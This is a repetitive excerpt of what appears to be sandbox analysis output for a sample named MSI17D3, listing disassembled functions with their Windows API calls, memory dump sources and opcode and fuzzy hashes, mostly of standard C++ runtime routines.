                                                                                                                                                                                • Instruction Fuzzy Hash: A6E1A0B4D01219ABEB106FA0CC42BBF7AA9EF41760F04442EF919A7391DF754D05A7B2
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBB531
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBB54F
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB577
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,0000000C,00000000,665E9022,?,00000000,00000000), ref: 00CBB5CF
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CBB6B7
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB6E1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3931714976-0
                                                                                                                                                                                • Opcode ID: 8c37711cecfdbfb95e65e4f707afed476c2cb664e0a4a5238088330077459740
                                                                                                                                                                                • Instruction ID: 6a51e6e7798e3bf24c5dd2f5539bf0338d656a454fa0b890110d708734a3fe0b
                                                                                                                                                                                • Opcode Fuzzy Hash: 8c37711cecfdbfb95e65e4f707afed476c2cb664e0a4a5238088330077459740
                                                                                                                                                                                • Instruction Fuzzy Hash: B951ACB0900208DFDB15CF98C880BEEBBB4FF10314F244559E829AB391D7B59E05DB92
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBB731
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBB74F
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB777
                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,00000000,665E9022,?,00000000,00000000), ref: 00CBB7CF
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CBB863
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB88D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3931714976-0
                                                                                                                                                                                • Opcode ID: 187b009bac93c4ec54c5cdf721f47638e80bd1a2fb2cfb9c64769f0cce7ff2a5
                                                                                                                                                                                • Instruction ID: d9d172fc45243f960189b2adb0a5494ca98bfc0839cc5eaf9de3fc35fb2e592d
                                                                                                                                                                                • Opcode Fuzzy Hash: 187b009bac93c4ec54c5cdf721f47638e80bd1a2fb2cfb9c64769f0cce7ff2a5
                                                                                                                                                                                • Instruction Fuzzy Hash: 6151B070900254DFCB21CF98D890BEEBBB4EF14310F24865DE855AB391DBB1AE45CBA1
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                • String ID: a/p$am/pm
                                                                                                                                                                                • API String ID: 3509577899-3206640213
                                                                                                                                                                                • Opcode ID: 58298a0628fe98178955538f42cd12ba502baa6ae6bf3f22345006422c64ad65
                                                                                                                                                                                • Instruction ID: 0ddc74c66efd4e8e4b5528b0fde2d9c6cf6b38e73eb40c5765fbe6c62d3ef278
                                                                                                                                                                                • Opcode Fuzzy Hash: 58298a0628fe98178955538f42cd12ba502baa6ae6bf3f22345006422c64ad65
                                                                                                                                                                                • Instruction Fuzzy Hash: EFC1F275900286DBCB248F6BC985ABA77B4FF45300F344049E915AB291D3B5AEC1CFE1
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00CD596F,00CD4900,00CD358F), ref: 00CD5986
                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CD5994
                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CD59AD
                                                                                                                                                                                • SetLastError.KERNEL32(00000000,00CD596F,00CD4900,00CD358F), ref: 00CD59FF
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                • Opcode ID: 2f03fc6318b64c882274f699be510a3e3a92e5995713abebfc037ed43c60db90
                                                                                                                                                                                • Instruction ID: 1189191fd31dac1de38751fcb29e3ad14c2287e76df16e95a03dddd8cdffecfc
                                                                                                                                                                                • Opcode Fuzzy Hash: 2f03fc6318b64c882274f699be510a3e3a92e5995713abebfc037ed43c60db90
                                                                                                                                                                                • Instruction Fuzzy Hash: 29018433219B12EFE62427756C96B6F6B94DB01779720132BF728C53E1EE624C02E190
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,URL,00000000,?,665E9022,?,00000004), ref: 00CB3294
                                                                                                                                                                                • MoveFileW.KERNEL32(?,00000000), ref: 00CB354A
                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00CB3592
                                                                                                                                                                                  • Part of subcall function 00CB1A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00CB1AF7
                                                                                                                                                                                  • Part of subcall function 00CB1A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00CB1B7D
                                                                                                                                                                                  • Part of subcall function 00CB2E60: LocalFree.KERNEL32(?,665E9022,?,?,00CF3C40,000000FF,?,00CB1242,665E9022,?,?,00CF3C75,000000FF), ref: 00CB2EB1
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileLocal$Free$AllocDeleteMoveNameTemp
                                                                                                                                                                                • String ID: URL$url
                                                                                                                                                                                • API String ID: 853893950-346267919
                                                                                                                                                                                • Opcode ID: 8fe06b9a6210dd7605aaa2aca6583c68fbcd979000f5e217b66a186670c735e7
                                                                                                                                                                                • Instruction ID: e32af8960ddacf30a5897cfa29f939a638d4fb8e2c247f7681e3a90ba1f796b2
                                                                                                                                                                                • Opcode Fuzzy Hash: 8fe06b9a6210dd7605aaa2aca6583c68fbcd979000f5e217b66a186670c735e7
                                                                                                                                                                                • Instruction Fuzzy Hash: C2C15870D142A89ADB25DF28CC98BDDBBB4BF54304F1442D9D409A7291EBB46F88CF91
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00CB3735
                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00CF4215,000000FF), ref: 00CB381A
                                                                                                                                                                                  • Part of subcall function 00CB2310: GetProcessHeap.KERNEL32 ref: 00CB2365
                                                                                                                                                                                  • Part of subcall function 00CB46F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00CB3778,-00000010,?,?,?,00CF4215,000000FF), ref: 00CB4736
                                                                                                                                                                                • _wcschr.LIBVCRUNTIME ref: 00CB37C6
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00CF4215,000000FF), ref: 00CB37DB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
                                                                                                                                                                                • String ID: ntdll.dll
                                                                                                                                                                                • API String ID: 3941625479-2227199552
                                                                                                                                                                                • Opcode ID: 3bc0c1517f43b5eb62e47192b2087ea286e4a6a10a1db8d9c7b5b2fc8630e399
                                                                                                                                                                                • Instruction ID: ffd59d407e29e3d67b5ce0f6ea5abc76ad90c33200570cc5fb366a897dfc9677
                                                                                                                                                                                • Opcode Fuzzy Hash: 3bc0c1517f43b5eb62e47192b2087ea286e4a6a10a1db8d9c7b5b2fc8630e399
                                                                                                                                                                                • Instruction Fuzzy Hash: 7F41B270A00645AFDB14DF68CC55BEEB7A8FF04310F14462AF926972C1EBB19B04CB51
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00CB1A20: LocalFree.KERNEL32(?), ref: 00CB1A42
                                                                                                                                                                                  • Part of subcall function 00CD3E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00CB1434,?,?,00CBD341,00CB1434,00D08B5C,?,00CB1434,?,00000000), ref: 00CD3EBA
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(665E9022,665E9022,?,?,00000000,00CF4981,000000FF), ref: 00CB62EB
                                                                                                                                                                                  • Part of subcall function 00CD2C98: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CA3
                                                                                                                                                                                  • Part of subcall function 00CD2C98: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CE0
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CB62B0
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB62B7
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$AddressConditionCurrentExceptionFreeHandleLocalModuleProcProcessRaiseVariableWake
                                                                                                                                                                                • String ID: IsWow64Process$kernel32
                                                                                                                                                                                • API String ID: 1333104975-3789238822
                                                                                                                                                                                • Opcode ID: 634f3fa2d36fb98d014c9d7a81c9b5483567b9b8f2758f852086f79f62fd67bd
                                                                                                                                                                                • Instruction ID: e221a82af1a764ac2bf1c6963c365b6c049557b1a59a7f778727c47308dcdda4
                                                                                                                                                                                • Opcode Fuzzy Hash: 634f3fa2d36fb98d014c9d7a81c9b5483567b9b8f2758f852086f79f62fd67bd
                                                                                                                                                                                • Instruction Fuzzy Hash: FD21D271904715DFDB10DFA4ED06BAEB7A8EB14B10F100A25F929E33D0EB756904DA62
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Mpunct$GetvalsH_prolog3
                                                                                                                                                                                • String ID: $+xv
                                                                                                                                                                                • API String ID: 2204710431-1686923651
                                                                                                                                                                                • Opcode ID: e021336d3240bda2cb348d96faf48c55dcd027c6bb30757c13081b1c180206b4
                                                                                                                                                                                • Instruction ID: 99430c5287ba42a477c27b655c60ffd47b0942672255322dd858460b7658eeaf
                                                                                                                                                                                • Opcode Fuzzy Hash: e021336d3240bda2cb348d96faf48c55dcd027c6bb30757c13081b1c180206b4
                                                                                                                                                                                • Instruction Fuzzy Hash: 2B21D3B1800B926EDB25DF75C490B7BBEF8AB09301F04495EF459C7A42D734EA05DBA0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(665E9022,665E9022,?,?,00000000,00CF4981,000000FF), ref: 00CB62EB
                                                                                                                                                                                  • Part of subcall function 00CD2C98: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CA3
                                                                                                                                                                                  • Part of subcall function 00CD2C98: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2CE0
                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 00CB62B0
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00CB62B7
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: EnterCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C58
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CB2427,00D0E638,00CF6B40), ref: 00CD2C8B
                                                                                                                                                                                  • Part of subcall function 00CD2C4E: RtlWakeAllConditionVariable.NTDLL ref: 00CD2D02
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$EnterLeave$AddressConditionCurrentHandleModuleProcProcessVariableWake
                                                                                                                                                                                • String ID: IsWow64Process$kernel32
                                                                                                                                                                                • API String ID: 2056477612-3789238822
                                                                                                                                                                                • Opcode ID: 37bd3745a7332c1a97de11eee813786d4585e86bf97f21f48c4a9adbf3298f41
                                                                                                                                                                                • Instruction ID: 363739480432c3161c35a2b0f11684bb00a3c1c9480135799ea34a928ede79f4
                                                                                                                                                                                • Opcode Fuzzy Hash: 37bd3745a7332c1a97de11eee813786d4585e86bf97f21f48c4a9adbf3298f41
                                                                                                                                                                                • Instruction Fuzzy Hash: F1116072904754DFDB14CF54ED05BAAB7A8EB14710F100A6AE829D37D0EB766904CA61
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,00CD6AA3,?,?,00D0DDCC,00000000,?,00CD6BCE,00000004,InitializeCriticalSectionEx,00CF97E8,InitializeCriticalSectionEx,00000000), ref: 00CD6A72
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                • API String ID: 3664257935-2084034818
                                                                                                                                                                                • Opcode ID: 15ecadb3b5cfc2b9f96a16b03bac09c760890f4e58495f84b42a4850aaece789
                                                                                                                                                                                • Instruction ID: bf61d037df776bc4b7c696a22314820050a8608145044baa464aad49d5e25d24
                                                                                                                                                                                • Opcode Fuzzy Hash: 15ecadb3b5cfc2b9f96a16b03bac09c760890f4e58495f84b42a4850aaece789
                                                                                                                                                                                • Instruction Fuzzy Hash: 5211A331A05725ABCF229B689C45B6D73A49F11770F258262FBA8FB380D770EE00D6D5
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,665E9022,?,?,00000000,00CF6A6C,000000FF,?,00CE2DC1,?,?,00CE2D95,?), ref: 00CE2E23
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CE2E35
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00CF6A6C,000000FF,?,00CE2DC1,?,?,00CE2D95,?), ref: 00CE2E57
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                • Opcode ID: 74b60c7c3d8f24a9f1bfd080299f512d67a9409496f51278df2c36a2e13ccb6c
                                                                                                                                                                                • Instruction ID: dba519bc89323f51ff6693d5ba9ad05bc9e73994e38656b35552a3d29659761c
                                                                                                                                                                                • Opcode Fuzzy Hash: 74b60c7c3d8f24a9f1bfd080299f512d67a9409496f51278df2c36a2e13ccb6c
                                                                                                                                                                                • Instruction Fuzzy Hash: C3018B71958669EFDB128F50DC05FBFB7BCFB04B11F044625F915A22A0D7759900CA51
                                                                                                                                                                                APIs
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00CE6E40
                                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 00CE6F01
                                                                                                                                                                                • __freea.LIBCMT ref: 00CE6F68
                                                                                                                                                                                  • Part of subcall function 00CE5BDC: HeapAlloc.KERNEL32(00000000,00000000,00CE3841,?,00CE543A,?,00000000,?,00CD6CE7,00000000,00CE3841,00000000,?,?,?,00CE363B), ref: 00CE5C0E
                                                                                                                                                                                • __freea.LIBCMT ref: 00CE6F7D
                                                                                                                                                                                • __freea.LIBCMT ref: 00CE6F8D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1096550386-0
                                                                                                                                                                                • Opcode ID: a168213b45a206f180f83eda3797473bb6718618eba1412a4af41a72aa65d606
                                                                                                                                                                                • Instruction ID: e9729051e9b7022618d155da26d3a5af2e923cef273aa4b10a06a733ee64ca8e
                                                                                                                                                                                • Opcode Fuzzy Hash: a168213b45a206f180f83eda3797473bb6718618eba1412a4af41a72aa65d606
                                                                                                                                                                                • Instruction Fuzzy Hash: C651E572A20286AFEF209FA6DC41EBF7AA9EF24790B150129FD14D7251E731DE10D760
                                                                                                                                                                                APIs
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBB8DD
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CBB900
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB928
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CBB98D
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CBB9B7
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 459529453-0
                                                                                                                                                                                • Opcode ID: 512ac29ef469a9ed8470315f39759b9a1663dc62ffc54da3a781b8e6798be1aa
                                                                                                                                                                                • Instruction ID: 314e39ec5af2c4d1ad6e2aa4198e86c4ab24ed74ea25a5c216f7e0a3488af814
                                                                                                                                                                                • Opcode Fuzzy Hash: 512ac29ef469a9ed8470315f39759b9a1663dc62ffc54da3a781b8e6798be1aa
                                                                                                                                                                                • Instruction Fuzzy Hash: CD310431D00218DFCB21DF54D950BAEBBB4EF20724F24459DE959A73A1D771AE01CBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,?,75EF4450,00CB5646,?,?,?,?,?), ref: 00CB5898
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
